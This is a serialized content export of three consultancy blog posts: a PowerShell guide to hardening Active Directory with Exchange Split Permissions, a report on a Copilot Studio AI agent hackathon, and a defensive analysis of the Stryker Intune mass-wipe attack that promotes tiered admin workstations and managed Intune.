($_.CmdletParameters))}},succeeded,error | ",[102,23692,23693],{"style":23658},"Export-Csv",[102,23695,23696],{"style":23678},"-Path",[102,23698,23659],{"style":23658},[102,23700,23701],{"style":23678},"-Delimiter"," \";\" ",[102,23704,23705],{"style":23678},"-Encoding"," Unicode ",[102,23708,23709],{"style":23678},"-NoTypeInformation",[12,23711,23712],{},[251,23713,23714],{},"Quick Analysis of caller and cmdlets:",[524,23716,23717,23733,23735,23743,23745],{},[102,23718,23719,23722,23723,540,23726,540,23728,540,23730,23732],{},[102,23720,23721],{"style":23658},"$CSVs"," = ",[102,23724,23725],{"style":23658},"Import-Csv",[102,23727,23696],{"style":23678},[102,23729,23659],{"style":23658},[102,23731,23701],{"style":23678}," \";\"",[531,23734],{},[102,23736,23737,23686,23739,23742],{},[102,23738,23721],{"style":23658},[102,23740,23741],{"style":23658},"Group-Object"," Caller",[531,23744],{},[102,23746,23747,23686,23749,23751],{},[102,23748,23721],{"style":23658},[102,23750,23741],{"style":23658}," CmdletName",[12,23753,23754],{},"Analyze the CSV for where AD permissions will be needed. 
Potentially optimize by moving all Exchange-relevant groups into dedicated OUs.",[41,23756,23758],{"id":23757},"enable-split-permissions-model","Enable Split Permissions Model",[12,23760,23761,23762,23765,23766,23770],{},"Follow Microsoft's instructions ",[251,23763,23764],{},"\"Switch to Active Directory split permissions\""," in\n",[2672,23767,23581],{"href":23768,"rel":23769},"https://learn.microsoft.com/en-us/exchange/configure-exchange-server-for-split-permissions",[2676],[3456,23771,23772],{},"(NOT RBAC split permissions)",[12,23774,23775,23776,23779],{},"In essence, it will remove the dangerous permissions of the ",[251,23777,23778],{},"\"Exchange Windows Permissions\""," group and also remove Exchange as a group member.",[524,23781,23782],{},[102,23783,23784,540,23787,540,23790,540,23793],{},[102,23785,23786],{"style":23658},"Setup.exe",[102,23788,23789],{"style":23678},"/IAcceptExchangeServerLicenseTerms_DiagnosticDataOFF",[102,23791,23792],{"style":23678},"/PrepareAD",[102,23794,23795],{"style":23678},"/ActiveDirectorySplitPermissions:true",[52,23797,420,23799,23801,23802],{"style":23798},"background:#f4f4f4; border-left:4px solid var(--color-green-blue); border-radius:0 6px 6px 0; padding:0.75rem 1rem; margin:1rem 0; font-size:0.88rem; color:#000520;",[251,23800,23610],{}," To revert back, simply use ",[63,23803,23804],{},"/ActiveDirectorySplitPermissions:false",[186,23806,23808],{"id":23807},"grant-ad-permissions","Grant AD Permissions",[12,23810,23811],{},"Create a custom AD group and make Exchange servers members.",[524,23813,23814,23820,23822,540,23825,23828,23829,23832,23833,23836,23837,540,23839,540,23842,23845,23846,23848,23828,23851,23854,23855],{},[102,23815,23816],{},[102,23817,23819],{"style":23818},"color:var(--color-black-40)","# adjust OU Path first!",[531,23821],{},[102,23823,23824],{"style":23658},"New-ADGroup",[102,23826,23827],{"style":23678},"-Name"," \"AD_Custom Exchange Split permissions replacement\" 
",[102,23830,23831],{"style":23678},"-GroupCategory"," Security ",[102,23834,23835],{"style":23678},"-GroupScope"," DomainLocal ",[102,23838,23696],{"style":23678},[251,23840,23841],{},"\"OU=Rights,OU=Groups,OU=T1,OU=_ADM,$((Get-ADDomain).DistinguishedName)\"",[102,23843,23844],{"style":23678},"-Description"," \"replaces the permissions lost by split permissions on relevant OUs\"",[531,23847],{},[102,23849,23850],{"style":23658},"Add-ADGroupMember",[102,23852,23853],{"style":23678},"-Members"," \"Exchange Trusted Subsystem\"\n",[102,23856,23857],{"style":23818},"# reboot Exchange servers for permissions via group to work",[12,23859,23860],{},"I’ve created a script to make delegating the AD permissions easy per use case.",[2110,23862,23863],{},[12,23864,23865,23866,23869],{},"Without these permissions the Exchange server would receive the error ",[63,23867,23868],{},"“INSUFF_ACCESS_RIGHTS”"," from AD.",[12,23871,23872,23873,23878],{},"Download ",[2672,23874,23877],{"href":23875,"rel":23876},"https://github.com/glueckkanja/code-snippets/blob/main/ExchangeADSplitPermission/Add-ExchangeADSplitPermissionOnOU.ps1",[2676],"Add-ExchangeADSplitPermissionOnOU.ps1"," from glueckkanja GitHub",[12,23880,23881],{},"It can grant the following PermissionTypes:",[12,23883,23885,23888,23890,23891,23893],{"style":23884},"background:#f5f5f5;padding:0.5rem 1rem;margin:0.25rem 0;border-left:3px solid #d8d8d8;",[251,23886,23887],{},"CreateUserAndContact",[531,23889],{},"Create/delete, ResetPassword and WriteAllProperties for Users and Contacts",[531,23892],{},[6638,23894,23895],{},"Exchange cmdlets: `New-Mailbox`, `New-RemoteMailbox`, `New-MailUser`, `New-MailContact` and matching `Remove-*`",[12,23897,23899,23902,23904,23905,23907],{"style":23898},"background:#f5f5f5;padding:0.5rem 1rem;margin:0.25rem 0;border-left:3px solid #d8d8d8",[251,23900,23901],{},"GroupManage",[531,23903],{},"Create/Delete Groups, Modify Member",[531,23906],{},[6638,23908,23909,23910,23912],{},"Exchange cmdlets: 
`New-DistributionGroup`, `Remove-DistributionGroup`, `Add-DistributionGroupMember`, `Update-DistributionGroupMember`, `Remove-DistributionGroupMember`",[531,23911],{},"Also: user managing DistributionGroups they own via EAC",[12,23914,23915,23918,23920,23921,23923],{"style":23898},[251,23916,23917],{},"UserSendAs",[531,23919],{},"Modify AD Permissions on Users",[531,23922],{},[6638,23924,23925],{},"Exchange cmdlet: `Add-ADPermission`",[12,23927,23928,23931,23933,23934,23936],{"style":23898},[251,23929,23930],{},"GroupSendAs",[531,23932],{},"Modify AD Permissions on Groups",[531,23935],{},[6638,23937,23925],{},[12,23939,23940],{},[251,23941,23942],{},"How to use the script:",[524,23944,23945,540,23947,23950,23951,23954,23955,23958,23959,23962,23964,540,23966,23968,23969,23971,23972,23958,23974,540,23976,23968,23978,23980,23981,23958,23983,540,23985,23987,23988,23990,23991,23958,23993,540,23995,23987,23997,23999,24000,23958],{},[102,23946,23877],{"style":23658},[102,23948,23949],{"style":23678},"-TargetOU"," \u003COU> ",[102,23952,23953],{"style":23678},"-PermissionType"," \u003CGroupManage|UserSendAs|GroupSendAs|CreateUserAndContact> ",[102,23956,23957],{"style":23678},"-Trustee"," \"AD_Custom Exchange Split permissions replacement\"\n",[102,23960,23961],{"style":23818},"# For example",[531,23963],{},[102,23965,23877],{"style":23658},[102,23967,23949],{"style":23678}," \"OU=ExchangeGroups,OU=HQ,OU=Alderaan,$((Get-ADDomain).DistinguishedName)\" ",[102,23970,23953],{"style":23678}," GroupManage ",[102,23973,23957],{"style":23678},[102,23975,23877],{"style":23658},[102,23977,23949],{"style":23678},[102,23979,23953],{"style":23678}," GroupSendAs ",[102,23982,23957],{"style":23678},[102,23984,23877],{"style":23658},[102,23986,23949],{"style":23678}," \"OU=Users,OU=HQ,OU=Alderaan,$((Get-ADDomain).DistinguishedName)\" ",[102,23989,23953],{"style":23678}," UserSendAs 
",[102,23992,23957],{"style":23678},[102,23994,23877],{"style":23658},[102,23996,23949],{"style":23678},[102,23998,23953],{"style":23678}," CreateUserAndContact ",[102,24001,23957],{"style":23678},[186,24003,24005],{"id":24004},"grant-exchange-rbac","Grant Exchange RBAC",[12,24007,24008],{},[251,24009,24010],{},"Re-enable -BypassSecurityGroupManagerCheck parameter for Add-DistributionGroupMember and Remove-DistributionGroupMember cmdlets:",[524,24012,24013],{},[102,24014,24015,540,24018,24020,24021,24024,24025,24027,24028,24030],{},[102,24016,24017],{"style":23658},"New-RoleGroup",[102,24019,23827],{"style":23678}," \"SplitPermission Security Group Creation and Membership\" ",[102,24022,24023],{"style":23678},"-Roles"," \"Security Group Creation and Membership\" ",[102,24026,23853],{"style":23678}," \"Organization Management\",\"Recipient Management\" ",[102,24029,23844],{"style":23678}," \"Brings back -BypassSecurityGroupManagerCheck to Add-DistributionGroupMember, but also needs AD ACL for Exchange Server on target DLs\"",[2110,24032,24033],{},[12,24034,24035,24037],{},[251,24036,23610],{}," Else you get \"-BypassSecurityGroupManagerCheck parameter is not available\" or \"You don't have sufficient permissions. This operation can only be performed by a manager of the group\"",[12,24039,24040,24042,24045,24047],{},[531,24041],{},[251,24043,24044],{},"Re-enable New-Mailbox, New-RemoteMailbox, New-MailContact, Remove-... cmdlets with needed parameters:",[531,24046],{},[524,24048,24049,540,24051,24053,24054,24056,24057,24027,24059,24061],{},[102,24050,24017],{"style":23658},[102,24052,23827],{"style":23678}," \"SplitPermission Mail Recipient Creation\" ",[102,24055,24023],{"style":23678}," \"Mail Recipient Creation\" ",[102,24058,23853],{"style":23678},[102,24060,23844],{"style":23678}," \"Brings back New-Mailbox, New-RemoteMailbox, New-MailUser, New-MailContact and matching Remove-... 
cmdlets, but additionally Exchange needs AD ACL for Exchange Server on target OUs\"",[41,24063,24065],{"id":24064},"conclusions","Conclusions",[12,24067,24068],{},"I hope this guide helps more organizations take the important step of securing their Active Directory against compromise via Exchange. In my experience implementing the Exchange AD Split Permissions model across multiple customers, I have not encountered any issues and the adoption has been smooth.",[12,24070,24071],{},"I also hope Microsoft will introduce a native, OU-based approach to achieve this level of granularity, rather than the current all-or-nothing model, which would make widespread adoption significantly easier.",[12,24073,24074,24075,1884,24080,24085],{},"A note on AD Tiering: Please do not log on to Exchange servers with Domain Admin or any other Tier 0 accounts. Treat Exchange servers as Tier 1 and implement AD Tiering as soon as possible. As a first step, I recommend using ",[2672,24076,24079],{"href":24077,"rel":24078},"https://www.pingcastle.com/",[2676],"PingCastle",[2672,24081,24084],{"href":24082,"rel":24083},"https://www.semperis.com/purple-knight/",[2676],"Purple Knight"," to assess your AD security posture and identify control path exposures.",[2127,24087,24088],{},"\ncode {\n  font-size: 
inherit\n}\n",{"title":65,"searchDepth":111,"depth":111,"links":24090},[24091,24092,24093,24094,24097,24101],{"id":23448,"depth":111,"text":23449},{"id":23495,"depth":111,"text":23496},{"id":23594,"depth":111,"text":23595},{"id":23635,"depth":111,"text":23636,"children":24095},[24096],{"id":23645,"depth":329,"text":23646},{"id":23757,"depth":111,"text":23758,"children":24098},[24099,24100],{"id":23807,"depth":329,"text":23808},{"id":24004,"depth":329,"text":24005},{"id":24064,"depth":111,"text":24065},{"lang":2171,"seoTitle":24103,"titleClass":2173,"date":24104,"blogtitlepic":24105,"socialimg":24106,"customExcerpt":24107,"keywords":24108,"hreflang":24109,"scripts":24116,"asideNav":24117,"maxContent":2181,"published":2181},"Exchange AD Split Permissions: Secure Active Directory with Least Privilege","2026-03-01","head-exchange-ad-split-permissions","/blog/heads/head-exchange-ad-split-permissions.jpg","Even organizations that have fully migrated their mailboxes to the cloud often still run on-premises Exchange servers and with them, an underestimated security risk for Active Directory. The \"AD Split Permissions\" model strips Exchange of the broad AD privileges attackers could exploit for a full domain compromise. Until now, adoption has largely failed due to the process changes it imposes on administrators. 
This article shows how to elegantly overcome exactly that hurdle: a script that selectively re-grants the lost AD permissions on the relevant OUs only, preserving the familiar admin workflow while still achieving the full security benefit.","Exchange Server, Active Directory, AD split permissions, RBAC, Exchange permissions, AdminSDHolder, least privilege, AD ACL, PowerShell",[24110,24112,24114],{"lang":2260,"href":24111},"/de/posts/2026-03-01-exchange-ad-split-permissions-hardening",{"lang":2263,"href":24113},"/es/posts/2026-03-01-exchange-ad-split-permissions-hardening",{"lang":2171,"href":24115},"/en/posts/2026-03-01-exchange-ad-split-permissions-hardening",{"slick":2181,"form":2181},{"menuItems":24118},[24119,24121,24123,24125,24127],{"href":24120,"text":23449},"#tldr-what-if-we-remove-the-downsides",{"href":24122,"text":23496},"#why-do-we-care-now",{"href":24124,"text":23595},"#but-why-is-no-one-doing-it",{"href":24126,"text":23636},"#show-me-this-no-regrets-option",{"href":24128,"text":24065},"#conclusions","/posts/2026-03-01-exchange-ad-split-permissions-hardening",{"title":23442,"description":65},"posts/2026-03-01-exchange-ad-split-permissions-hardening","hbPQT2iCiaFmQVLIJ_ceL8Krt8RrsgYm5rLL3T9NCBU",{"id":24134,"title":24135,"author":24136,"body":24137,"cta":2166,"description":24141,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":24173,"moment":24175,"navigation":2181,"path":24188,"seo":24189,"stem":24190,"tags":24191,"webcast":2168,"__hash__":24195},"content_en/posts/2026-03-16-ai-agent-hackathon.md","Six Agents. Four Weeks. Real Production.",[2461],{"type":9,"value":24138,"toc":24171},[24139,24142,24145,24148,24151,24154,24159,24162,24165,24168],[12,24140,24141],{},"How many hours does your IT department spend each week on tasks an agent could handle in minutes?",[12,24143,24144],{},"There is a type of process that almost every IT department in German companies knows: someone reads contracts. 
Someone else sorts requirements into categories. Yet another person answers the same questions about deliveries that someone already answered yesterday. These are not glamorous problems. But they are the ones that collectively cost tens of thousands of hours per year — and they are surprisingly well-suited for AI agents, if you know where to apply the lever.",[12,24146,24147],{},"Six companies did exactly that in February at our office in Offenbach. Kiekert now categorizes R&D requirements using rule-based logic, with a confidence score and a feedback loop. The agent is already running in production. Dr. Oetker built a Contract Review Assistant that checks IT contracts for critical clauses and generates a structured review report for procurement and legal. Eckes-Granini entered with two agents: an onboarding agent that guides new employees through MFA, Office setup, and security policies from their first login, and a logistics agent that answers dispatchers' questions about shipments, rates, and carriers. igefa developed a voice-based hotline agent for internal IT support, connected to JIRA and Confluence. And lila logistik brought perhaps the most unusual project: a use case generator that monitors SharePoint and Exchange to identify automation potential — because the real problem is often not the technology, but that no one in the organization recognizes the right places to automate.",[12,24149,24150],{},"All of this was built in Copilot Studio, with Agent Flows, Dataverse connections and MCP connectors, supported by four of our MVPs. Four weeks of building, alongside regular day-to-day business. Participants had to carve out every hour for it, between tickets, quarterly closes, and operational demands. 
That six working agents stood at the end says less about the technology than about the teams who built them.",[12,24152,24153],{},"On March 10th at the Microsoft Office Frankfurt came the final test: six presentations, 20 minutes each, judged on business impact, technical depth, and audience applause (yes, that is also on the scoring sheet). Kiekert won because their agent is running in production, built by someone from the business unit — no IT background, no prior experience with Copilot Studio. Dr. Oetker won because contract review is so universal that the jury started thinking about their own IT contracts afterwards. That all six teams built a working agent in four weeks alongside their regular workload — that was ultimately the real news of the day.",[23484,24155],{"thumb":24156,"alt":24157,"id":24158,":full-width":3821},"/thumbs/thumb-ai-agent-hackathon.jpg","Presentation of the glueckkanja AI Agent Hackathon at Microsoft Office Frankfurt: six teams presenting their Copilot Studio agents to an audience.","GjumQAnKj8k",[52,24160,24161],{"style":23491},"glueckkanja AI Agent Hackathon – Six companies, six agents, four weeks",[12,24163,24164],{},"The format is called the glueckkanja AI Agent Hackathon. It grew out of a Microsoft Hackathon in Munich where we participated with Knorr-Bremse. Microsoft then asked us to continue the format with our customers. The idea is simple: companies apply with a concrete process that is currently manual. We sharpen the use case, define the architecture, and build together. For those not ready to jump straight into the hackathon: we also offer workshops to identify use cases and prepare the agent architecture — either as an entry point or as a standalone format.",[12,24166,24167],{},"The next glueckkanja AI Agent Hackathon starts in fall 2026. Registration is open. If you want to identify use cases and prepare your environment beforehand: we are happy to help. 
Reach out to us.",[12,24169,24170],{},"Thank you to Sylvia and Miriam from Microsoft for their trust in the format. To Kiekert, Dr. Oetker, Eckes-Granini, igefa and lila logistik for their courage and commitment. And to our glueckkanja team for making it happen.",{"title":65,"searchDepth":111,"depth":111,"links":24172},[],{"lang":2171,"seoTitle":24174,"titleClass":2173,"date":24175,"categories":24176,"blogtitlepic":24177,"socialimg":24178,"customExcerpt":24179,"keywords":24180,"hreflang":24181,"published":2181},"glueckkanja AI Agent Hackathon: Six Companies Build AI Agents with Copilot Studio","2026-03-16",[2962],"head-ai-agent-hackathon.jpg","/blog/heads/head-ai-agent-hackathon.jpg","Six companies, four weeks of building, six working AI agents — that was the first glueckkanja AI Agent Hackathon. Kiekert, Dr. Oetker, Eckes-Granini, igefa and lila logistik built agents in Copilot Studio that are running in production today. Here is what was built and how the format works.","AI Agent Hackathon, Copilot Studio, glueckkanja, AI Agents, Microsoft Copilot, Agent Flows, Dataverse, MCP Connector, Kiekert, Dr. 
Oetker, Eckes-Granini, igefa, lila logistik, AI automation, enterprise AI, process automation",[24182,24184,24186],{"lang":2260,"href":24183},"/de/posts/2026-03-16-ai-agent-hackathon",{"lang":2171,"href":24185},"/en/posts/2026-03-16-ai-agent-hackathon",{"lang":2263,"href":24187},"/es/posts/2026-03-16-ai-agent-hackathon","/posts/2026-03-16-ai-agent-hackathon",{"title":24135,"description":24141},"posts/2026-03-16-ai-agent-hackathon",[24192,24193,24194,22194],"AI","Copilot Studio","Hackathon","_mIXHNCs5jKlIww9Bh4E4kHE1qECSwksCqRuS7m98X0",{"id":24197,"title":24198,"author":24199,"body":24200,"cta":2166,"description":24204,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":24449,"moment":24451,"navigation":2181,"path":24499,"seo":24500,"stem":24501,"tags":24502,"webcast":2168,"__hash__":24504},"content_en/posts/2026-03-20-stryker-attack-intune-privilege.md","No Malware Needed. Just One Admin Account.",[2209],{"type":9,"value":24201,"toc":24437},[24202,24205,24208,24212,24214,24217,24220,24223,24227,24229,24232,24235,24238,24241,24245,24247,24250,24253,24257,24259,24262,24265,24268,24272,24274,24277,24283,24287,24289,24297,24300,24303,24306,24312,24315,24320,24329,24333,24335,24343,24346,24355,24358,24361,24364,24367,24370,24373,24377,24379,24382,24385,24388,24396,24399,24402,24406,24408],[12,24203,24204],{},"Wednesday, March 11, 2026. Employees at Stryker offices across 79 countries switched on their computers and found them blank. Login screens replaced by a logo. Corporate laptops, company phones, personal devices enrolled in the company's BYOD program. All wiped simultaneously, overnight. No ransomware. No malware signatures. 
Nothing for an endpoint detection tool to catch.",[12,24206,24207],{},"The attacker, a pro-Iranian hacktivist group named Handala, had turned Stryker's own IT management infrastructure into the weapon.",[41,24209,24211],{"id":24210},"what-actually-happened","What actually happened",[12,24213,31],{},[12,24215,24216],{},"The core of the attack was not a sophisticated exploit or a zero-day vulnerability. It was something far simpler and, frankly, far more common: an administrator account was compromised, and that account had access to Microsoft Intune.",[12,24218,24219],{},"According to reporting by BleepingComputer, roughly 80,000 devices were wiped between 5:00 and 8:00 a.m. UTC. Handala claimed the number exceeded 200,000, including servers and mobile devices across the company's global operations in 79 countries.",[12,24221,24222],{},"No custom malware. No malicious binary to detect. A living-off-the-land attack, executed entirely through a legitimate management console.",[41,24224,24226],{"id":24225},"why-this-attack-succeeded","Why this attack succeeded",[12,24228,31],{},[12,24230,24231],{},"There is a structural issue at the root of this, and it is not unique to Stryker. It is endemic across enterprises.",[12,24233,24234],{},"Most organizations treat administrative tasks and day-to-day work as activities that can comfortably coexist on the same device, under the same user identity. An IT administrator answers emails, browses the web, clicks the occasional link, and — from that same session, on that same machine — manages cloud infrastructure, approves access changes, or in this case, touches a device management console with the power to wipe the entire fleet.",[12,24236,24237],{},"This is the attack surface. When the everyday work context and the privileged administration context share a common endpoint and identity, any compromise of that endpoint is automatically a compromise of everything that identity can reach. 
Phishing, credential theft via infostealer malware, adversary-in-the-middle (AiTM) session token theft — all of them become a direct path to the most powerful controls in your environment. No privilege escalation needed. The attacker simply uses what's already there.",[12,24239,24240],{},"In Stryker's case, that access happened to include an Intune tenant managing devices across six continents.",[41,24242,24244],{"id":24243},"cisa-has-seen-enough","CISA has seen enough",[12,24246,31],{},[12,24248,24249],{},"The scale and brazenness of the attack prompted an unusual response: CISA, the U.S. Cybersecurity and Infrastructure Security Agency, issued guidance directly addressing the risk of compromised device management platforms. The agency confirmed it was aware of the attack vector and urged organizations to take concrete action, ensuring that high-impact Intune functions like device wipes require a second administrator's approval before executing.",[12,24251,24252],{},"This is a rare and significant signal. When a federal security agency issues targeted guidance in the immediate aftermath of a specific incident, the message is clear: this is not an edge case. This is a pattern, and other organizations are likely running the same exposure.",[41,24254,24256],{"id":24255},"separation-is-not-a-luxury-it-is-the-control","Separation is not a luxury. It is the control.",[12,24258,31],{},[12,24260,24261],{},"The Stryker attack is a useful case study precisely because it illustrates the blast radius of a flat privilege model. The attacker did not need to escalate privileges through a chain of vulnerabilities. They gained access to credentials, or a session token, at one level and found that level was already sufficient to cause catastrophic, global, irreversible damage.",[12,24263,24264],{},"The architectural answer to this problem has a name: the Microsoft Enterprise Access Model (EAM). 
Its core principle is tiered administration: privileged operations are performed using dedicated accounts and dedicated devices, strictly separated from the everyday work context. This least-privilege approach means that a compromised productivity account cannot reach the management plane, and a compromised management account cannot reach control-plane operations. This applies equally to cloud-only environments and hybrid setups including on-premises reach-back to Active Directory via Entra ID, where a single over-privileged account can still bridge the cloud and the domain.",[12,24266,24267],{},"The idea is straightforward. Administrative work happens on administrative devices. The identity used to manage your Microsoft 365 tenant, your Intune environment, your Azure infrastructure, is never the same identity used to read email or attend Teams calls. The device used for those administrative sessions is hardened, restricted, and isolated from the regular internet browsing and productivity context that creates exposure. Lateral movement becomes structurally harder because there is no lateral path.",[41,24269,24271],{"id":24270},"two-layers-of-defense","Two layers of defense",[12,24273,31],{},[12,24275,24276],{},"Addressing this threat model properly requires working at two levels simultaneously: securing who can touch your management plane and its credentials, and hardening how that management plane itself is configured and operated. 
These are not the same problem, and both matter.",[12,24278,24279],{},[2642,24280],{"alt":24281,"src":24282},"Risk and product mapping for the Stryker attack scenario: Managed Red Tenant addresses identity and access risks, Managed Intune addresses endpoint management risks","https://res.cloudinary.com/c4a8/image/upload/v1774005366/blog/pics/stryker_risk_product_mapping.svg",[186,24284,24286],{"id":24285},"managed-red-tenant-protecting-the-administrative-context","Managed Red Tenant: protecting the administrative context",[12,24288,47],{},[12,24290,24291,24292,24296],{},"The first layer is isolating privileged access entirely. This is what our ",[2672,24293,24295],{"href":24294},"/en/security/managed-red-tenant","Managed Red Tenant"," is built for.",[12,24298,24299],{},"The Managed Red Tenant provides a fully isolated, cloud-based administrative environment, a dedicated Microsoft Entra tenant (\"the Red Tenant\") used exclusively for privileged operations. Administrative identities live here. Administrative devices are managed here. Nothing from the regular work environment bleeds across.",[12,24301,24302],{},"For the most critical roles, those with Control Plane access, like Global Administrators, we implement the \"Clean Keyboard\" approach: a physical Privileged Admin Workstation (PAW) with dedicated hardware, hardened policies, and no exposure to the everyday work context whatsoever. For broader administrative roles, we offer scalable Virtual Access Workstations (VAW) built on a hardened Azure Virtual Desktop infrastructure within the Red Tenant. The access path itself is protected through Microsoft Entra Private Access, applying Zero Trust Network Access and Conditional Access policies before any session can be established.",[12,24304,24305],{},"Microsoft Entra Internet Access blocks public internet access from administrative sessions and restricts connectivity strictly to privileged interfaces and authorized tenant environments. 
Near real-time session revocation is possible through Universal Conditional Access Evaluation, meaning a revoked credential doesn't linger as a valid session.",[12,24307,24308,24309,24311],{},"The Managed Red Tenant is monitored 24/7 by our ",[2672,24310,3696],{"href":4296},", with custom-developed detections built specifically around administrative permissions and access patterns. An attacker who somehow compromised a credential in this environment would not get three undetected hours to execute wipe commands across a global fleet.",[12,24313,24314],{},"This matters particularly for roles like Intune administrators. They know how to secure clients, but securing a privileged admin workstation requires a different set of skills — enterprise access architecture, identity hardening, Zero Trust controls — that typically sits with the security team. A Managed Red Tenant removes that burden entirely: Intune admins get a professionally managed, consistently hardened workstation without needing to become security workstation experts themselves. The same applies to any highly privileged role across the organization.",[23484,24316],{"thumb":24317,"alt":24318,"id":24319,":full-width":3821},"/thumbs/thumb-managed-red-tenant.jpg","Jan Geisbauer and Thomas Naunheim discussing Managed Red Tenant cybersecurity strategy","rOEIvItNkjE",[52,24321,24322,24323],{"style":23491},"More on our ",[2672,24324,24328],{"href":24325,"target":4914,"rel":24326},"https://www.youtube.com/playlist?list=PLPxBXiOFJRHelegu_B-uZAyz2UrOSxioL",[24327],"noopener","YouTube channel",[186,24330,24332],{"id":24331},"managed-intune-locking-down-the-management-plane-itself","Managed Intune: locking down the management plane itself",[12,24334,47],{},[12,24336,24337,24338,24342],{},"The second layer is ensuring that Intune, the very tool that was weaponized in the Stryker attack, is configured, operated, and continuously maintained to the highest security standard. 
This is where our ",[2672,24339,24341],{"href":24340},"/en/entra-intune/managed-intune","Managed Intune"," service comes in.",[12,24344,24345],{},"One of the core findings from incidents like Stryker is that organizations often inherit Intune environments that have grown organically over time: Policies stacked on top of policies, manual changes made through the portal that are difficult to audit, and security baselines that have not kept pace with Microsoft's own evolving recommendations. That kind of environment is exactly where configuration drift creates exploitable gaps.",[12,24347,24348,24349,24354],{},"Microsoft has recently published ",[2672,24350,24353],{"href":24351,"rel":24352},"https://techcommunity.microsoft.com/blog/intunecustomersuccess/best-practices-for-securing-microsoft-intune/4502117",[2676],"best practices for securing Microsoft Intune"," — a timely signal that even Microsoft considers Intune hardening a topic that needs explicit attention across the industry. Our Managed Intune service is built on exactly these principles, and we have implemented Microsoft's recommendations as part of our baseline.",[12,24356,24357],{},"Our Managed Intune service is built on the glueckkanja Intune Foundation: A set of proven, continuously maintained best practices for device management, delivered entirely as code using Terraform and our own TerraProvider. Every change is automated, version-controlled, and auditable. 
There are no undocumented click-through configurations that an attacker could exploit by understanding the gap between what was intended and what was set.",[12,24359,24360],{},"From a security perspective, this means Zero Trust, App Protection Policies, and Endpoint Security configurations are applied by design, consistently, across Windows, macOS, iOS, and Android, not as one-time deployments, but as continuously enforced, evergreen baselines that track Microsoft's own security guidance as it evolves.",[12,24362,24363],{},"Critically, Managed Intune reflects the operational maturity required to secure modern endpoint management: continuous compliance monitoring, structured change governance, and regular service reviews, not as optional extras, but as baseline operations. But securing the Intune configuration is only half the picture. If the administrator accessing the console does so from an unprotected device, the management plane remains exposed regardless which is exactly where the Managed Red Tenant completes the model.",[12,24365,24366],{},"Since all configurations are deployed as code based on the Intune Foundation, we enforce a strict four-eyes principle with peer review, additional automated validation, and controlled deployment pipelines. This eliminates unmanaged portal changes within the Intune Foundation and ensures a consistent, auditable, and secure baseline across all devices.",[12,24368,24369],{},"Administrative access is governed through a least-privilege model using GDAP and Azure Lighthouse, with clearly defined responsibilities and tightly scoped access to the customer tenant. This significantly reduces the attack surface associated with privileged operations.",[12,24371,24372],{},"Device-level actions, including destructive operations, remain under customer responsibility, as their execution is tightly coupled to organization-specific processes and internal governance frameworks. 
Microsoft and CISA recommend securing such actions through additional safeguards, such as multi-admin approval controls within Intune.",[41,24374,24376],{"id":24375},"the-uncomfortable-question","The uncomfortable question",[12,24378,31],{},[12,24380,24381],{},"The Stryker attack is not an indictment of Microsoft Intune. Intune behaved exactly as designed. It executed the commands it received from an authenticated administrator. The failure was not in the tool. It was in the absence of controls around who could reach that tool, from what context, and with what level of authorization.",[12,24383,24384],{},"That is a governance and architecture problem. And it is the same problem that exists in most organizations running Microsoft 365 today.",[12,24386,24387],{},"If your administrators access Intune, Entra ID, or Azure from the same devices and identities they use for everyday work and if your Intune environment has grown through years of manual portal changes rather than a structured, automated operating model, you are carrying the same structural risk that Stryker carried on March 10th. The question is whether an adversary will find that exposure before you address it.",[12,24389,24390,24392,24393,24395],{},[2672,24391,24295],{"href":24294}," addresses the privilege and identity layer. ",[2672,24394,24341],{"href":24340}," addresses the configuration and operational layer. 
Together, they close the two gaps that made the Stryker attack possible.",[12,24397,24398],{},"If you want to understand how either service maps to your current environment, or where your specific exposure points are, we are happy to talk through it.",[12,24400,24401],{},"We will also be publishing a deep-dive article shortly, examining how the Stryker incident was able to happen in the first place.",[41,24403,24405],{"id":24404},"further-information","Further information",[12,24407,31],{},[1254,24409,24410,24417,24423,24430],{},[1257,24411,24412],{},[2672,24413,24416],{"href":24414,"rel":24415},"https://www.cisa.gov/secure-cloud-business-applications",[2676],"CISA: Securing Cloud Business Applications",[1257,24418,24419],{},[2672,24420,24422],{"href":24351,"rel":24421},[2676],"Microsoft: Best practices for securing Microsoft Intune",[1257,24424,24425],{},[2672,24426,24429],{"href":24427,"rel":24428},"https://techcrunch.com/2026/03/19/cisa-urges-companies-to-secure-microsoft-intune-systems-after-hackers-mass-wipe-stryker-devices/?utm_campaign=social",[2676],"TechCrunch: CISA urges companies to secure Microsoft Intune systems after hackers mass-wipe Stryker devices",[1257,24431,24432],{},[2672,24433,24436],{"href":24434,"rel":24435},"https://marketplace.microsoft.com/de-de/product/saas/glueckkanja-gabag.redtenant?tab=overview",[2676],"Managed Red Tenant on Azure 
Marketplace",{"title":65,"searchDepth":111,"depth":111,"links":24438},[24439,24440,24441,24442,24443,24447,24448],{"id":24210,"depth":111,"text":24211},{"id":24225,"depth":111,"text":24226},{"id":24243,"depth":111,"text":24244},{"id":24255,"depth":111,"text":24256},{"id":24270,"depth":111,"text":24271,"children":24444},[24445,24446],{"id":24285,"depth":329,"text":24286},{"id":24331,"depth":329,"text":24332},{"id":24375,"depth":111,"text":24376},{"id":24404,"depth":111,"text":24405},{"lang":2171,"seoTitle":24450,"titleClass":2173,"date":24451,"categories":24452,"blogtitlepic":24453,"socialimg":24454,"customExcerpt":24455,"keywords":24456,"hreflang":24457,"asideNav":24464,"contactInContent":24479,"maxContent":2168,"published":2181},"The Stryker Attack: How a Compromised Admin Account Wiped 80,000 Devices via Intune","2026-03-20",[2176],"head-stryker.jpg","/blog/heads/head-stryker.jpg","On March 11, 2026, Handala wiped devices across 79 countries using nothing but a compromised Intune admin account. No malware, no exploit, just legitimate management tooling turned into a weapon. 
